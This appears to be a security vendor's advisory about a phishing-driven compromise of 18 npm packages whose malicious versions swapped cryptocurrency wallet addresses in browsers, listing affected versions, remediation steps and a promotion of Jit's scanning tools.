What You Need To Know About the NPM Supply Chain Attack

Yesterday, a critical supply chain attack impacting 18 widely used npm packages was disclosed. These packages collectively account for nearly 2 billion weekly downloads.

What happened?

The maintainer’s account appears to have been compromised via a phishing campaign. Yesterday, an attacker uploaded malicious versions of the packages.

What does the attack do?

The malicious payload injects itself into the web browser to monitor cryptocurrency wallet activity. When it detects a transaction, it alters the network response, replacing legitimate destination addresses with attacker-controlled ones and hijacking the transfer before it is signed.

Which packages are affected?

• ansi-regex@6.2.1
• ansi-styles@6.2.2
• backslash@0.2.1
• chalk-template@1.1.1
• chalk@5.6.1
• color-convert@3.1.1
• color-name@2.0.1
• color-string@2.1.1
• color@5.0.1
• debug@4.4.2
• has-ansi@6.0.1
• is-arrayish@0.3.3
• simple-swizzle@0.2.3
• slice-ansi@7.1.1
• strip-ansi@7.1.1
• supports-color@10.2.1
• supports-hyperlinks@4.1.1
• wrap-ansi@9.0.1

Status: All malicious versions have now been removed from npm.

What you should do

• Revert to safe versions: Pin dependencies to versions published before the compromise. Remove your lock files (package-lock.json or yarn.lock) and reinstall to ensure only clean packages are in use.
• Scan your codebase: Run npm audit or leverage an SCA tool to detect any vulnerable versions in your dependency tree.
• Check your SBOM report: Use the SBOM to gain full visibility into your dependencies and quickly assess potential exposure.

How Jit protects you

Jit has got you covered in several aspects:

1. Jit automatically scans your git repositories and detects the vulnerable packages in your code base, using our Software Composition Analysis (SCA) tool. 

2. Jit helps you set guardrails for your developers to prevent introducing those vulnerable packages in new code (PR/MR).

3. Jit provides a Software Bill of Materials (SBOM) report, giving you a full dependency audit across your projects. This ensures you have complete visibility into every component and can quickly assess your exposure in situations like this.

Jit's SCA tool runs daily. If you wish to trigger a full code scan immediately, you can simply Deactivate and Activate the SCA tool (Jit-003) from the Jit Max Security Plan.